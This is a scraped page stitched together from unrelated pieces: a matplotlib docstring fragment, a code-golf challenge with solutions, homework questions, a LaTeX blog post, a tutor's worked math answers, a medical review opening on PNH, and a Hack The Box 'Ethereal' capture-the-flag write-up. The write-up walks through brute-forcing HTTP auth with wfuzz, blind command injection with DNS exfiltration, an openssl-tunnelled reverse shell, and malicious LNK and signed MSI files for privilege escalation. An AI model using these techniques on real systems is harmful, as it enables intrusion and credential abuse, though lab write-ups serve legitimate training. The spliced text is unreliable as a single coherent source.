Parameters: Aarray-like(M, N)The matrix to be displayed. fignumNone or int or FalseIf None, create a new figure window with automatic numbering. If a nonzero integer, draw into the figure with the given number (create it if it does not exist). If 0, use the current axes (or create one if it does not exist). Note Because of how Axes.matshow tries to set the figure aspect ratio to be the one of the array, strange things may happen if you reuse an existing figure. AxesImage **kwargsimshow arguments
|
|
# Permutation Encoding
Write a program which can encode text to avoid reusing characters, and convert back.
Both normal and encoded forms are restricted to a particular character set: the space character with code point 32, the tilde character ~ with code point 126, and all characters between. This is 95 total characters. It's a printable subset of ASCII.
The encoded text can be up to 95 characters long. The normal text can be up to 75 characters long, because above 75 it would be impossible to uniquely encode all messages.
## Encoding
There are some requirements for the encoding:
• Uses only characters from the character set described above
• Uses each character at most once
• Uniquely encodes all valid messages
Other than that, you're free to pick any variant.
## Input
Input will consist of 2 items:
• A boolean: false to encode, true to decode
• A string: the message to be encoded/decoded
How you receive the input is up to you.
The boolean can be as a boolean or integer in the range [-2, 2] in your language's format. If the esoteric language doesn't have booleans or integers, use the closest analogue. I'm not doing the "or any 2 distinct values" because then you could use an encoding and decoding program as the values and evaluate them.
## Output
Output should consist of only the encoded/decoded string. Leading and trailing newlines are okay.
## Scoring
I still encourage you to try harder languages even if they won't win.
## Testing
Testing will generally be done with Try it Online!. For convenience, please provide a link to your program with some test input already filled in.
These are the steps to test a program:
• Pick a valid normal string.
• Encode it using the program.
• Check that the encoded form is valid.
• Decode it using the program.
• Check that the final result matches the original string.
This can be repeated with other test strings for confidence.
If you show a working case and no failing cases have been found, we will assume your program works.
# Reference Implementation
I am providing a reference implementation that shows one possible method, in hopes of making this problem more approachable. I used it to generate the examples. I recommend you try the problem yourself before looking at how I did it, that way you may independently come up with a better mapping.
# Examples
Since you can choose a different encoding, as well as different input/output methods, your program might not match these examples.
## Empty
Input:
0
Output:
(none)
Input:
1
Output:
(none)
## Small
Input:
0
Hello, world!
Output:
#mvcD_YnEeX5?
Input:
1
#mvcD_YnEeX5?
Output:
Hello, world!
## Max Size
Input:
0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Output:
C-,y=6Js?3TOISp+975zk}.cwV|{iDjKmd[:/]$Q1~G8vAneoh #&<LYMPNZB_x;2l*r^(4E'tbU@q>a!\WHuRFg0"f%X) Input: 1 C-,y=6Js?3TOISp+975zk}.cwV|{iDjKmd[:/]$Q1~G8vAneoh #&<LYMPNZB_x;2l*r^(4E'tbU@q>a!\WHuRFg0"f%X)
Output:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Extras
How did I get the 75 characters limit? I could have brute force checked it of course, but there's a slightly more mathematical method for counting the number of possible encoded messages for a given character set:
$$F(n)=\sum_{k=0}^{n}{\frac{n!}{(n-k)!}}=e\Gamma(n+1,1)\approx en!$$
Here are the relevant bounds. There's plenty more valid encoded messages than normal messages, but still enough normal messages that you'll need a variable length encoding.
$$F(95)\approx 2.81\times 10^{148} \\ {95}^{75}\approx 2.13\times 10^{148} \\ 95!\approx 1.03\times 10^{148}$$
The problem was inspired by a phenomenon on the Discord chat platform. In Discord, you can "react" to chat messages, which adds a little emoji underneath. You can react many times on a single chat message. Each emoji can only be added once. They remember the order they were added and display oldest to newest, left to right. You can add some non-emojis too. People sometimes write short messages in reactions, and when their message has repeat characters they're forced to get creative, usually they opt for lookalike characters.
• Welcome to PPCG! Great first challenge! Here's a link to the Tour if you haven't seen it, and the Sandbox where you can get challenges reviewed before posting. – pizzapants184 Sep 3 '18 at 10:09
• Do we really need to use TIO? If so, then it sounds very restricting. – Erik the Outgolfer Sep 3 '18 at 15:30
• I ask for a link to some online compiler/interpreter since it makes it convenient for others to test. It doesn't have to be TIO. If you don't link at all, it will be frustrating trying to test your submission, it's hard to tell if the submission doesn't work or we're just running it wrong. – EPICI Sep 3 '18 at 16:31
# Python 3, 339 338 bytes
lambda b,s:b and G(f(s))or F(g(s))
a=''.join(chr(32+i)for i in range(95))
f=lambda s:95*f(s[1:])+ord(s[0])-31if s else 0
F=lambda n:chr((n-1)%95+32)+F((n-1)//95)if n else ''
g=lambda s,d=a:1+d.find(s[0])+len(d)*g(s[1:],d.replace(s[0],''))if s else 0
G=lambda n,d=a:d[(n-1)%len(d)]+G((n-1)//len(d),d.replace(d[(n-1)%len(d)],''))if n else''
Try it online!
Same length, uses a list instead of a string for the ASCII chars Try it online!.
Overview: WIP
• Because the number of printable ASCII strings with 75 or fewer characters is 21570794844237986466892014672640809417999612393958961235356099871415520891159490775110725336452276983325050565474469409911975201387750975629116626495, which is less than the number of valid encoded strings (28079792812953073919740255779032193344167751681188124122118245935431845577725060598682278885127314791932249387894125026034584206856782082066829102875)
• All we need to do is theoretically sort the valid encoded strings and the valid non-encoded strings, take the index in the correct list of our given input, then return the string at that index in the other list.
• f: Converts an input (non-encoded) string to an integer based on its index in the theoretical list of ASCII strings sorted by length and then lexicographically.
• The empty string is 0
• Single-char strings are 1 to 95
• Two-char strings are 96 to 9120, etc.
• F: Undoes f, converts an integer to a (non-encoded) string.
• g: Converts an input (encoded) string to an integer (<= 28079792812953073919740255779032193344167751681188124122118245935431845577725060598682278885127314791932249387894125026034584206856782082066829102875 for valid inputs) based on its index in the theoretical list of valid encoded strings sorted by length and then lexicographically.
• The empty string is 0
• Single-char strings are 1 to 95
• Two-char strings are 96 to 9025, etc.
• G: undoes g, converts an integer to an (encoded) string.
• Main function: Unnamed lambda b,s:b and G(f(s))or F(g(s)): Uses the boolean b to determine whether to encode G(f(s)) or decode F(g(s)) the string, and does so.
# Charcoal, 94 bytes
≔⁰ζ¿N«≔γδ≔¹εFS«≧⁺×ε⊕⌕γιζ≧×Lγε≔Φγ¬⁼κιγ»Wζ«§δ⊖ζ≔÷⊖ζ⁹⁵ζ»»«F⮌S≔⁺×⁹⁵ζ⊕⌕γιζWζ«≦⊖ζ§γζ≔Φγ¬⁼κ§γζγ≧÷⊕Lγζ
Try it online! Link is to verbose version of code. Explanation:
≔⁰ζ
Set z, which represents the permutation index, to zero, as both sides of the condition need it.
¿N«
If the first input (as a number) is non-zero, then we're doing encoding.
≔γδ
Save a copy of the predefined ASCII character set g in d, as we need to change it.
≔¹ε
Assign 1 to e. This represents the place value of each encoded character.
FS«
Loop over the encoded characters.
≧⁺×ε⊕⌕γιζ
Update the permutation index.
≧×Lγε
Update e with the place value of the next encoded character.
≔Φγ¬⁼κιγ»
Remove the character from the encoding set.
Wζ«
Repeat while the permutation number is non-zero.
§δ⊖ζ
Print the next decoded character.
≔÷⊖ζ⁹⁵ζ»»
Divide the bijective representation by 95. This completes decoding.
«F⮌S
Loop over the plain text in reverse, to avoid having to calculate the powers of 95.
≔⁺×⁹⁵ζ⊕⌕γιζ
Convert the plain text as bijective base 95 to the permutation index.
Wζ«
Repeat while the permutation index is non-zero.
≦⊖ζ
Decrement the permutation index.
§γζ
Print the next encoded character.
≔Φγ¬⁼κ§γζγ
Remove that character from the encoding set.
≧÷⊕Lγζ
Divide the permutation index by the previous length of the encoding set.
After fixing of the bug noticed by Anders Kaseorg the program unfortunately grew larger.
(x:y)?f|f x=(0,x)|0<1=(p+1,q)where(p,q)=y?f
a!n=take n a++drop(n+1)a
x#f=fst$f?(x==) a x y z=y!!(q z-1)+b z s x b[]_ _=0 b(x:y)f c=u(x#f)+v f*(b y(c f x)c) c=const e=divMod f n|n<2=1|1<2=n*f(n-1) g y z x=h(x-r)l s y where(l,r)=z?(x<) h n l f c|l<1=[]|0<1=f!!w m:h d(l-1)(c f m)c where(d,m)=nev f i=r(k^) k=95 o=r(\x->f kdivf(k-x)) q=length r f=scanl(+)0$map f[1..k]
s=[' '..'~']
u=toInteger
w=fromInteger
v=u.q
x=g(\a->(\b->a!w b))o.a c i
y=g c i.a(\a->(\b->a!(b#a)))o
Try it online!
Use x "Hello World" to encode and y "TR_z" to decode.
## How?
We can enumerate all possible input sequences and all possible encoded sequences, so the encoding is rather simple:
1) determine the number for the input sequence; 2) construct the output sequence corresponding to that number.
(The decoding is done in the reverse order).
## Explanation
This is an original (pre-golf) version for ease of understanding.
-- for ord
import Data.Char
-- all possible characters
s = [' ' .. '~']
-- get the first position in a list where the predicate returns True
(x:y) firstPosWhere fn
| fn x = 0
| 0<1 = 1 + firstPosWhere y fn
-- the same as above but return both the position and the list element
(x:y) firstPosAndElemWhere fn
| fn x = (0, x)
| 0 < 1 = (p + 1, q) where (p, q) = firstPosAndElemWhere y fn
-- the sets of numbers corresponding to input strings and to encoded strings are divided into ranges
inputRanges = scanl (+) 0 [95 ^ x | x <- [1..95]]
outputRanges = scanl (+) 0 [fac 95 div fac (95 - x) | x <- [1..95]]
-- convert an input string into a number
toN s = inputRanges !! (length s - 1) + toN' s
toN' [] =0
toN' (x:y) = toInteger (ord x - 32) + 95 * toN' y
-- convert a number into an (unencoded) string
fromN n = fromN' (n - r) l where
(l, r) = inputRanges firstPosAndElemWhere (n <)
fromN' n l
| l < 1 = []
| 0 < 1 = s !! fromInteger m : fromN' d (l - 1) where
(d, m) = n divMod 95
-- factorial
fac n|n<2=1|1<2=n*fac(n-1)
-- remove nth element from a list
a without n = take n a ++ drop (n + 1) a
-- construct an encoded string corresponding to a number
encode n = encode' (n - r) l s where
(l, r) = outputRanges firstPosAndElemWhere (n <)
encode' n l f
| l < 1 = []
| otherwise = (f !! m') : encode' d (l - 1) (f without m') where
(d, m) = n divMod (toInteger $length f) m' = fromInteger m -- convert an encoded string back into number decode z = r + decode' z s where r = outputRanges !! (length z - 1) decode' [] _ = 0 decode' (x:y) f = toInteger p + (toInteger$ length f) * (decode' y (f without p)) where
p = f firstPosWhere (x ==)
• ('~' <$[1..75]) ## 0 gives a division by zero exception. (The string of ~s in your tests is only 65 long, and the string you label as “Longer Than 75” isn’t.) – Anders Kaseorg Sep 8 '18 at 1:26 # Clean, 182 bytes import StdEnv,Data.List$b s=hd[v\\(u,v)<-if(b)id flip zip2(iterate?[])[[]:[p\\i<-inits[' '..'~'],t<-tails i,p<-permutations t|p>[]]]|u==s]
?[h:t]|h<'~'=[inc h:t]=[' ': ?t]
?[]=[' ']
Try it online!
Enumerates every valid encoding and every valid message, returning one or the other depending on the order of the arguments zip2 receives. Explained:
$b s // function$ of flag b and string s is
= hd [ // the first element in the list of
v // the value v
\\ (u, v) <- // for every pair of u and v from
if(b) // if b is true
id // do nothing
flip // otherwise, flip the arguments to
zip2 // a function which creates pairs applied to
(iterate a []) // repeated application of ? to []
[[]: [ // prepend [] to
p // the value p
\\ i <- inits [' '..'~'] // for every prefix i in the character set
, t <- tails i // for every suffix t of i
, p <- permutations t // for every permutation of the characters in t
| p > [] // where p isn't empty
]]
| u == s // where the second element u equals s
]
? [h: t] // function ? of a list
| h < '~' // if the first element isn't a tilde
= [inc h: t] // increment it and return the list
= [' ': ? t] // otherwise change it to a space
? [] // function ? when the list is empty
= [' '] // return a singleton list with a space
It's really, really slow! Faster (in practice) version below (but with similar time complexity):
import StdEnv,Data.List,Data.Func,StdStrictLists,StdOverloadedList
increment :: [Char] -> [Char]
increment []
= [' ']
increment ['~':t]
= [' ':increment t]
increment [h:t]
= [inc h:t]
chars =: hyperstrict [' '..'~']
? :: *Bool [Char] -> [Char]
? b s
= let
i :: *[[Char]]
i = inits (chars)
t :: *[[Char]]
t = filter (not o isEmpty) (concatMap tails i)
p :: *[[Char]]
p = concatMap permutations t
in (if(b) encode decode) [] [[]:p]
where
encode :: [Char] *[[Char]] -> [Char]
encode d l
| d == s
= Hd l
| otherwise
= encode (increment d) (Tl l)
decode :: [Char] *[[Char]] -> [Char]
decode d l
| Hd l == s
= d
| otherwise
= decode (increment d) (Tl l)
Try it online!
|
|
# While Rosa is taking classes at the local community college to earn her degree in landscaping, she works part-time as a florist's assistant. This part-time work is an example of _____. a. a career b. telecommuting c. a job d. outsourcing
###### Question:
While Rosa is taking classes at the local community college to earn her degree in landscaping, she works part-time as a florist's assistant. This part-time work is an example of _____. a. a career b. telecommuting c. a job d. outsourcing
### Which produces barium-137 when it undergoes gamma decay? A. Cesium-137 B. Cesium-138 C. Barium-137 D. Barium-138
Which produces barium-137 when it undergoes gamma decay? A. Cesium-137 B. Cesium-138 C. Barium-137 D. Barium-138...
### Based on the equation, how many grams of Br2 are required to react completely with 36.2 grams of AlCl3? AlCl3 + Br2 → AlBr3 + Cl2
Based on the equation, how many grams of Br2 are required to react completely with 36.2 grams of AlCl3? AlCl3 + Br2 → AlBr3 + Cl2...
### Before I could stop the cat, it jumped on the table, grabbed your sandwich, and ran away with it. simple compound-complex compound complex
Before I could stop the cat, it jumped on the table, grabbed your sandwich, and ran away with it. simple compound-complex compound complex...
### Choose which word fits the description. Which is NOT a person? la maestra el estudiante la palabra la profesora
Choose which word fits the description. Which is NOT a person? la maestra el estudiante la palabra la profesora...
### Read this line from the text:They aim to kindle interest and to direct the activity of the awakened student along sound lines.In using the phrase sound lines, the author wants to suggest the professor's arguments are (5 points)correct and straightforwardincorrect and confusingprecise and ineffectualimprecise and effectual
Read this line from the text:They aim to kindle interest and to direct the activity of the awakened student along sound lines.In using the phrase sound lines, the author wants to suggest the professor's arguments are (5 points)correct and straightforwardincorrect and confusingprecise and ineffectual...
### Check the punctuation of the following sentence. I like apples; however, I do not like bananas. O correct incorrect
Check the punctuation of the following sentence. I like apples; however, I do not like bananas. O correct incorrect...
### 20 POINTS!!! For the following quadratic equation, determine the nature of the roots. x^2-6x-22=0
20 POINTS!!! For the following quadratic equation, determine the nature of the roots. x^2-6x-22=0...
### Which statement best explains how...
Which statement best explains how......
### Amanda earned a score of 940 on a national achievement test that was normally distributed. The mean test score was 850 with a standard deviation of 100. What proportion of students had a higher score than Amanda? Use your z table
Amanda earned a score of 940 on a national achievement test that was normally distributed. The mean test score was 850 with a standard deviation of 100. What proportion of students had a higher score than Amanda? Use your z table...
### What is full of holes but still holds water?
What is full of holes but still holds water?...
### What is the smallest square number ? [1 marks] 1 4 9 10
What is the smallest square number ? [1 marks] 1 4 9 10...
### Which of the following is true about a nonlinear function? It has a constant rate of change. It can be curved. It looks like a straight line. It must cross the origin.
Which of the following is true about a nonlinear function? It has a constant rate of change. It can be curved. It looks like a straight line. It must cross the origin....
### Write this expression is the standard form. 1/5(10x-5)-3
write this expression is the standard form. 1/5(10x-5)-3...
### Five less than a number is at least -28
five less than a number is at least -28...
|
|
## Archive for April, 2007
### The problems with this site
April 20, 2007
1. In order to get this posting facility to operate in a way I like, I need to enter the following into adblock: *wordpress.com/wp-includes/js/tinymce/tiny_mce*
2. The $\LaTeX$ is not directly copy and pastable into standard $\LaTeX$. This is not good. The dollar symbol should be strictly reserved for mathematical typsetting. As if anyone would be so base as to actually want to write about real currency.
In other news, I have uploaded a proof of a combinatorial identity to my website.
I’ve moved here, since this site supports $\LaTeX$. I discovered this after looking at the blog of Terry Tao. It is still an unresolved conjecture as to whether or not this site will be updated with greater frequency than my previous blog.
|
|
# Hack The Box - Ethereal
## Quick Summary
Hey guys today Ethereal retired and here is my write-up about it. And as the difficulty says , It’s insane ! The most annoying part about this box is that it was very hard to enumerate because we only get a blind RCE and the firewall rules made it even harder because it only allowed TCP connection for 2 ports. It was fun and annoying at the same time but I liked it. It’s a Windows box and its ip is 10.10.10.106 I added it to /etc/hosts as ethereal.htb , Let’s jump right in !
## Nmap
As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC ethereal.htb
And we get FTP on port 21 , HTTP on port 80 and 8080. It also tells us that FTP anonymous authentication is allowed. As always we will enumerate HTTP first.
## HTTP Initial Enumeration
On port 80 we see this website :
The only interseting thing is in the menu we see an Admin-area :
Clicking on that we get redirected to this page which has some other options like Notes , Messages , Desktop and Ping :
By going to notes we only get this :
So now we know that there’s a “test connection” page somewhere , we also get a potential username alan. By clicking on messages we get nothing , but desktop :
And it’s very clear that this is fake , also the user.txt is a troll :
By clicking on ping we get redirected to port 8080 which asks us for authentication and it uses http basic auth :
So now we know what’s on port 8080 , the “Test Connection” page. But we need credentials to access it.
One more thing to check is sub directory enumeration with gobsuter or any alternative :
gobuster only found /corp with the wordlist /usr/share/wordlists/dirb/common.txt and that’s the subdirectory that had the admin stuff. We can’t get any more info and there’s nothing to exploit so next thing to look at is FTP
## FTP Enumeration
On FTP there are some files but the most interesting ones are FDISK.zip and DISK.zip so we will check them first :
We will unzip them :
Then we will check what kind of files do we have with file :
Most likely they are mountable disks so we will create a directory to mount them and call it mnt then we will make a directory for disk1 , disk2 and fdisk and finally we will mount them mount -o loop [Disk] [Directory] :
In disk1 and disk2 there are some files that are not very interesting :
But on fdisk there’s a directory called pbox :
It contains an executable called pbox.exe and a dat file called pbox.dat :
## Getting Credentials
We will switch to a windows box to run that executable , you can alternatively use wine or a program called dosbox. wine didn’t work for me and dosbox kept crashing every 15 seconds.
When we try to open it it asks for a password :
At this point the only option I had was to guess the password because I didn’t know how to bruteforce the password in this case , however the password was “password” :D , so no bruteforce is needed it’s only a quick guess , after we get in , we see this password database :
databases :
msdn :
learning :
ftp drop :
backup :
truecrypt :
management server :
svn :
Back to our kali , now we can create a list with all the information we got :
I put the passwords in a separate list to bruteforce the http auth with it :
We will use wfuzz and we will try the username alan first :
wfuzz -u http://ethereal.htb:8080 --basic alan:FUZZ -w passwords.txt
Password : !C414m17y57r1k3s4g41n!
## Blind RCE
Now after we login we get the “Test Connection” page and we have an input for the ip address to ping.
Now we can try to bypass that and inject system commands using & or | , but we don’t get any output. I also tried to host nc.exe on a python http server and used certutil to download it but the python server didn’t get any requests. Finally when I ran responder :
I finally got something :
We can try to execute a system command and get the output by doing this :
This is executing whoami then taking the output and doing nslookup with the output to our ip :
We get etherealalan and that’s unusual as we expected ethereal\alan.
We will start enumerating the filesystem this way , read this if you don’t understand some of the for commands that we will use.
So the current directory is c:\windows\system32\inetsrv
We also need to know the users on the box :
We have 5 users on the box alan , jorge , Public , rupal and Administrator. We are executing commands as alan
Next thing to look at is the installed programs :
We notice that OpenSSL is installed which is unusual , we also need to know why can’t we make the box connect back to us so we will check the firewall rules. In our case the easiest way to do this is to execute the command and only look for the string Rule Name: then redirect that output to a file , and read that file like we are doing. But first we need to find a place that we can write to. After some attempts I could write to c:\users\public\desktop\shortcuts , so we will do this :
Then we will list the contents of c:\users\public\desktop\shortcuts :
And we see that we have successfully written into that directory , next step is to read the file :
It’s only allowing TCP conections to port 73 and 136 , we saw earlier that openssl was installed on the box , we can create a SSL/TLS server on these ports and use openssl to make the box connect back to us.
## Generating certs and setting up the server
First step is to generate certificates because we need them to set up the server :
Then we will split our terminal and run 2 servers , one on port 73 and the other on port 136 :
We are setting up 2 servers because we are going to use openssl on the box to connect on port 73 and take our input , then we will pipe that input to cmd.exe then we will pipe the output to our server on port 136.
Now we need to locate openssl.exe , if we listed the contents of OpenSSL-v1.1.0 in Program Files (x86) (can also be written Progra~2. check this) we will get this output :
We see a directory called bin that’s where openssl.exe is located so the path is c:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe
Now everything is ready , in the ping page we will write this :
Then we will check our server :
Now we will write the commands on the first server (port 73) , then we will refresh the ping page , to send the post request again (this will pipe our input from port 73 to cmd.exe then to the server on port 136) then we will get our output on the second server.
alan’s desktop doesn’t have the flag so we need to escalate to another user , there’s a note on alan’s desktop in a file called note-draft.txt:
## Creating a malicious lnk and getting User
From the note we knew that there’s a lnk on Public’s desktop and other users on the box are using it.
So if we replaced it with a payload we can get a shell as another user. There’s a tool on github called LNKup I used it to create the payload :
To uplaod it we will close any one of the servers and run it again but this time we will redirect the lnk file to it :
Then on the ping page we will type this :
We will close the server , run the 2 servers and get our shell as alan like we did before , then we will delete the original lnk and copy ours with the name of the old lnk :
Then we will close the 2 servers , run them again and wait for someone to execute the lnk file , after a minute we will get a shell as jorge :
With this we don’t need to refresh any pages because the connection is not handled by the ping page anymore so the command will be piped immediately from the first server to the second server.
Finally we owned user !
## More Filesystem Enumeration
If we checked the other drives :
fsutil fsinfo drives
We will find that C is not the only drive and there’s also D.
Unfortunately if someone started to enumerate without doing this important step in windows enumeration , they won’t get anything.
Contents of D:
In DEV there’s a directory called MSIs and it has a note :
So we have to create a malicious msi and place it there to get a shell as rupal. We also need to get the certs to sign the msi , the certs are found in D:\Certs , MyCA.cer and MyCA.pvk , to transfer them to our box we will use openssl to base64 encode the certs then we can copy and decode on our box.
Now we will go to a windows box again to create the msi
## Creating Malicious msi and getting root
In order to create the msi we will use wixtools , you can use other msi builders but they didn’t work for me.
We will create an msi that executes our lnk file :
We will use candle.exe from wixtools to create a wixobject from msi.xml
Then we will use light.exe to create the msi file from the wixobject
After that we need tools from microsoft sdk to sign our msi , first we will use makecert.exe to create new certs from the original certs we got from the box
Then we will use pvk2pfx.exe to create a pfx for both the cer and the pvk files :
And finally we will use signtool.exe to sign the msi with the pfx :
Now back to our kali we will upload the msi the same way we uploaded the lnk file before , and we also need to make sure that the lnk file is in c:\users\public\desktop\shortcuts\ because the msi is just executing that lnk. We will put the msi into D:\DEV\MSIs
Then we will close the servers , run them again and wait for around 3-5 minutes until rupal opens the msi
And we got root !
That’s it , Feedback is appreciated !
|
|
TutorMe homepage
Subjects
PRICING
COURSES
Start Free Trial
Christopher B.
passionate about the field of mathematics
Tutor Satisfaction Guarantee
Linear Algebra
TutorMe
Question:
Does the given $$2\times2$$ matrix have an inverse? $( \begin{bmatrix} 3 &6 \\ 2 &4 \end{bmatrix}$)
Christopher B.
Recall that a matrix has an inverse if and only if it is nonsingular, i.e., the determinant of the matrix is not equal to zero. To determine if this matrix has an inverse, we can find the determinant. If the determinant is zero, the matrix does not have an inverse, otherwise, it does. The determinant of a $$2\times 2$$ of the form \begin{bmatrix} a &b \\ c&d \end{bmatrix} is given by $$(a)(d)-(c)(b)$$. Thus, the determinant of the given matrix is ( \begin{aligned} &(3)(4) - (2)(6) \\ \\ &= 12 - 12 \\ \\ &= 0 \end{aligned}) Since the determinant of the given matrix is zero, it is singular, and thus does not have an inverse.
Trigonometry
TutorMe
Question:
Use one of the sum or difference identities for sine and cosine to find the exact value of $( \csc \left(\frac{3\pi}{2} \right)$)
Christopher B.
One way to solve this problem is to rewrite the cosecant function in terms of sine and use the sine of sum identity. As \begin{aligned} \csc x = 1/ \sin x \end{aligned}, The given function becomes $( \frac{1}{\sin \left( \frac{3\pi}{2}\right)}$) Rewriting \begin{aligned} \frac{3\pi} {2} \text{ as } \frac{2\pi}{2} + \frac{\pi}{2} \end{aligned}, we get ( \begin{aligned} \frac{1}{\sin \left( \frac{2\pi}{2} + \frac{\pi}{2}\right)}\end{aligned}) Recalling the sine of sum identity, \begin{aligned} \sin \left( a+b \right) = \sin (a) \cos (b) + \cos (a) \sin (b) \end{aligned}, we have ( \begin{aligned} & \frac{1}{\sin \left(\frac{2\pi}{2}\right) \cos \left(\frac{\pi}{2}\right) + \cos \left(\frac{2\pi}{2}\right) \sin \left(\frac{\pi}{2}\right)} \\ \\ = & \, \, \frac{1}{\sin \left(\pi\right) \cos \left(\frac{\pi}{2}\right) + \cos \left(\pi\right) \sin \left(\frac{\pi}{2}\right)} \\ \\ = & \, \, \frac{1}{\left(0\right) \left(0\right) + \left(-1\right) \left(1\right)} \\ \\ =& \, \, \frac{1}{0-1} \\ \\ =& \, \, \frac{1}{-1} \\ \\ =&\, \, \boxed{ -1} \\ \\ \end{aligned})
Calculus
TutorMe
Question:
Evaluate the integral $( \int_0^e \ln x^2 \, dx$)
Christopher B.
Using the power rule for logarithms, we can re-write $$\ln x^2$$ as $$2 \ln x$$. Now the given integral becomes $(\int _0^e 2 \ln x\, dx$) Since $$2$$ is a constant, we can pull it out of the integral. This gives us $( 2\int_0^e \ln x \, dx$) We can now solve the integral using integration by parts. Recalling that the formula for integration by parts is \begin{aligned} \int_a^b u\, dv = \left. uv \right \vert_a^b - \int_a^b v\, du \end{aligned}, we can let $$u= \ln x$$ and $$dv = dx$$. This gives $$du = \frac{1}{x} dx$$ and $$v = x$$. Thus, ( \begin{aligned} &2\int_0^e \ln x \, dx \\ \\ &= 2 \left[ \left. x\ln x \right \vert_0^e - \int_0^e \frac{x}{x}\, dx \right] \\ \\ &= 2 \left[ \left. x\ln x \right \vert_0^e - \int_0^e dx \right] \\ \\ & = 2 \left[ \left. x\ln x \right \vert_0^e - \left. x \right \vert_0^e \right] \\ \\ & = 2 \left[ \left(e \ln e - 0\right) - \left( e-0 \right) \right]\\ \\ & = 2 \left(e \ln e - e \right) \\ \\ & = 2 \left(e - e \right) && \text{as } \ln e = 1 \\ \\ & = 2(0) \\ \\ & = \boxed{0} \end{aligned})
Send a message explaining your
needs and Christopher will reply soon.
Contact Christopher
|
|
Article Text
Paroxysmal nocturnal haemoglobinuria: Nature's gene therapy?
Free
1. R J Johnson1,
2. P Hillmen2
1. 1Department of Haematology, Birmingham Heartlands Hospital, Bordesley Green East, Birmingham B9 5SS, UK
2. 2Haematological Malignancy Diagnostic Service, The General Infirmary at Leeds, Great George Street, Leeds LS1 3EX, UK
1. Correspondence to:
Dr R J Johnson, Birmingham Heartlands Hospital, Bordesley Green East, Birmingham B9 5SS, UK;
johnsonr{at}heartsol.wmids.nhs.uk
## Abstract
The development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene in one or more haemopoietic stem cells and an abnormal, hypoplastic bone marrow environment. When both of these conditions are met, the fledgling PNH clone may flourish. This review will discuss the pathophysiology of this disease, which has recently been elucidated in some detail.
• paroxysmal nocturnal haemoglobinuria
• PIG-A gene
• aplastic anaemia
• AA, aplastic anaemia
• ER, endoplasmic reticulum
• GPI, glycosyl phosphatidylinositol
• GlcNAc, N-acetylglucosamine
• PEA, phosphoethanolamine
• PI, phosphatidylinositol
• PNH, paroxysmal nocturnal haemoglobinuria
• VSG, variant surface glycoprotein
## Request Permissions
If you wish to reuse any or all of this article please use the link below which will take you to the Copyright Clearance Center’s RightsLink service. You will be able to get a quick price and instant permission to reuse the content in many different ways.
The development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene in one or more haemopoietic stem cells and an abnormal, hypoplastic bone marrow environment. When both of these conditions are met, the PNH clone may flourish. Recently, the pathophysiology of this disease has been elucidated in some detail and we now have rational theories concerning the clinical manifestations of PNH, its association with other haematological disorders (such as aplasia and myelodysplasia), and the sequence of events that leads to overt disease. Spontaneous somatic mutations are common in the PIG-A gene, leading to failure of synthesis of the glycosyl phosphatidylinositol (GPI) anchor. Without this structure, many proteins are unable to attach to cell surfaces. Red blood cells lose complement defence proteins, which explains the classic feature of intravascular complement mediated haemolysis. There is indirect evidence that platelet activation with consequent thrombosis is caused by a similar mechanism. The relative growth advantage of PNH cells in a hypoplastic marrow is also, presumably, a direct or indirect result of these alterations in surface antigen composition, although the precise pathophysiological mechanisms remain to be described. It is probable that the association with aplasia is explained by this relative growth advantage and that clonal evolution to a leukaemic state is a consequence of the primary insult causing the aplasia. In this way, PNH can be seen as an attempt to restore a form of useful, if abnormal, haemopoiesis in a damaged bone marrow: nature's gene therapy.
## THE EVOLUTION OF OUR UNDERSTANDING OF PNH
PNH as a clinical entity has puzzled physicians and scientists for 200 years. Perhaps the first description was “An account of a singular periodic discharge of blood from the urethra” written in 1794 by a Scottish surgeon, Charles Stewart. However, the first detailed description is credited to Paul Strübing in 1882.1 His patient had a six year history of passing dark urine intermittently in the mornings, always clearing by noon. His conclusions were detailed and astonishingly perceptive, suggesting as he did that there was intravascular haemolysis and that some of the patient's symptoms were the result of thrombosis. He even concluded (correctly) that a red blood cell defect was to blame. Despite this insight, the work was largely ignored and when Marchiafava reported a case in Italy 29 years later it was regarded as a new entity.2 Michelli published further observations in 1931 and used the weighty term “splenomegalic haemolytic anaemia with haemoglobinuria and haemosiderinuria, Marchiafava–Michelli type” from which the disease retains the eponym.3 The modern term PNH was first coined shortly before Michelli's paper in a description of a case from the Netherlands.4
Attempts to explain the haemolysis began in Rotterdam in 1911, when Hÿmans van den Bergh noted that PNH erythrocytes were sensitive to lysis in vitro when exposed to carbon dioxide.5 By the 1930s it had been shown that the lysis was complement mediated and pH dependent: being greatest in acidified conditions.6 This formed the basis for Ham's test,7 which was the diagnostic gold standard until its replacement by flow cytometry in recent years.
In 1944, Sir John Dacie first noted the association of PNH with aplasia in a case of Fanconi's anaemia.8 In the 1950s, the defect was shown to be present in other haemopoietic lineages, with the observation that the neutrophil alkaline phosphatase was reduced or absent in PNH.9 This led Dacie to suggest that PNH was an acquired clonal disorder arising in a haemopoietic stem cell.10 This important and perceptive idea was later confirmed by an elegant report in two patients with PNH who were also heterozygous for the enzyme glucose-6-phosphate dehydrogenase.11 In this study, it was shown that the patients' red cells with a PNH phenotype contained only one isotype of glucose-6-phosphate dehydrogenase whereas their residual, non-PNH cells contained both.
“Ham's test was the diagnostic gold standard until its replacement by flow cytometry in recent years”
From the 1960s onwards, an increasing number of proteins were shown to be missing from the cell surface in PNH. These included molecules known to be involved in the regulation of complement at cell surfaces. It was hypothesised that their absence caused a complement mediated intravascular haemolysis. Decay accelerating factor (DAF/CD55), which has a role in the inactivation of complement at an early stage of the cascade, was thought to be important but individuals with the Inab red cell phenotype, who have an inherited DAF deficiency, had no clinical illness or in vitro red cell complement sensitivity.12 CD59, which inhibits the formation of the membrane attack complex (the final step in the complement cascade) was the next candidate. Clinical evidence for the importance of this molecule came in 1992 when a 22 year old man was described who had a homozygous deficiency of CD59 on all his cells and suffered PNH-like symptoms, with haemolysis and cerebral thrombosis.13 It is probable that the haemolytic and thrombotic features of PNH are mediated by complement sensitivity and that CD59 deficiency is an important cause of this.
